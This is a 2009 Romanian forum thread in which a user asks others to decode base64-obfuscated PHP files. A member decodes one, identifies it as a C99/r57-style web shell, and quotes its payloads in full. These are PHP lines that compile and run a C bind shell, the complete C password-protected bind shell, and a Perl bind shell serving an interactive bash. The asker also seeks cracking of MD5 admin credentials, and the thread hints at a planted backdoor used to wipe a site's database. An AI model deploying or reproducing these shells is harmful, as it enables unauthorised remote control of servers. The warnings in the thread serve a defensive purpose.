Decodare fisiere

As dorii si eu daca poate cineva sa imi decodeze 2 fisiere codate in base64 ...eu am incercat fara succes .... cele pe care le-am atasat .. merci in avans ..

e simplu. Chestie de 2-3 minute

Hai ca mi-am facut mila de tine  
Am atasat mai jos fisierul decodat.
ATENTIE!!! Fisierul decodat este raportat de Avira ca fiind un virus (PHP/C99Shell.C).


 decodat.php   97.65K   27 downloads

Si AVG'u il detecteaza ca ceva similar.

Dyshka69, esti sigur ca vrei sa rulezi fisierul ala?
o simpla rulare ar putea compromite un server linux.
Are niste fisiere PERL si C++ criptate tot cu base64

Spre exemplu la linia 1585:

 cf("/tmp/bd.c",$port_bind_bd_c);
 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
 @unlink("/tmp/bd.c");
 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
 $_POST['cmd']="ps -aux | grep bd";

$port_bind_bd_c este ceva de genul:

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{  
 int sockfd, newfd;
 char buf[30];
 struct sockaddr_in remote;
 if(fork() == 0) { 
 remote.sin_family = AF_INET;
 remote.sin_port = htons(atoi(argv[1]));
 remote.sin_addr.s_addr = htonl(INADDR_ANY); 
 sockfd = socket(AF_INET,SOCK_STREAM,0);
 if(!sockfd) perror("socket error");
 bind(sockfd, (struct sockaddr *)&remote, 0x10);
 listen(sockfd, 5);
 while(1)
  {
   newfd=accept(sockfd,0,0);
   dup2(newfd,0);
   dup2(newfd,1);
   dup2(newfd,2);
   write(newfd,"Password:",10);
   read(newfd,buf,sizeof(buf));
   if (!chpass(argv[2],buf))
   system("echo welcome to r57 shell && /bin/bash -i");
   else
   fprintf(stderr,"Sorry");
   close(newfd);
  }
 }
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++) 
{
if(entered[i] == '\n')
entered[i] = '\0'; 
if(entered[i] == '\r')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}

cat si un script perl initilizat la linia 1593 (inteligenta metoda... daca C++ nu merge incearca perl )

cf("/tmp/bdpl",$port_bind_bd_pl);
 $p2=which("perl");
 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
 $_POST['cmd']="ps -aux | grep bdpl";

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

Si eu ucm reusesc sa le decodez ???

este deja decodat (vezi postul #2).
ce altceva mai vrei?

 darkangelbv, on Feb 5 2009, 01:37, said:

Ruleaza deja pe acest site ... ca de  aici este ...

Edited by Dyshka69, 05 February 2009 - 23:31.

 Dyshka69, on Feb 5 2009, 23:29, said:

STIU CA E AIUREA ... DAR AS VREA CA CINEVA SA IMI DECODEZE ACESTE 2 FISIERE IAR SI SA LE LASE CU NUMELE LOR


si sa decripteze si acest username si parola


// Login & password crypted with md5
$name='6171124cf9a629261c48f2706cdc9326';
$pass='c9fa12d3165965c34c65545636916101';

eu nu am reusit

Edited by Dyshka69, 07 February 2009 - 00:40.

 core.php   127.71K   5 downloads

Edited by Scripturi, 07 February 2009 - 00:44.

astea 2 fisiere sunt IDENTICE. TU ai probleme cu vederea?
Din primele 2 pe care le-ai uploadat doar UNUL este criptat. Si anume "caring.php" care l-am uploadat cu numele de "decodat.php"

 DarkAngelBv, on Feb 7 2009, 00:41, said:

decodeaza si i acel user si  aceea parola ,,, pls


PS AM OBSERVAT ACUM CA FUNCTIONS SI CARING SUNT LA FEL )

Edited by Dyshka69, 07 February 2009 - 00:56.

User-ul si parola sunt criptate cu MD5.
MD5 este un tip de hash-uire one-way. adica odata criptat nu mai poate fi refacut in forma initiala.
Mai multe despre md5 gasesti pe wikipedia http://en.wikipedia.org/wiki/MD5

Sa inteleg ca ai furat scriptul de undeva si nu sti user-ul si parola. Ei bine, as putea sa te ajut, dar nu o voi face. Daca esti baiat inteligent poti trece simplu de user-ul si parola criptata.

Nu e furat ... Si nu e de la admin ... asta e un fel de siguranta a celui ce a facut scriptul si de acolo intra si sterge baza de date la site ... si altele .....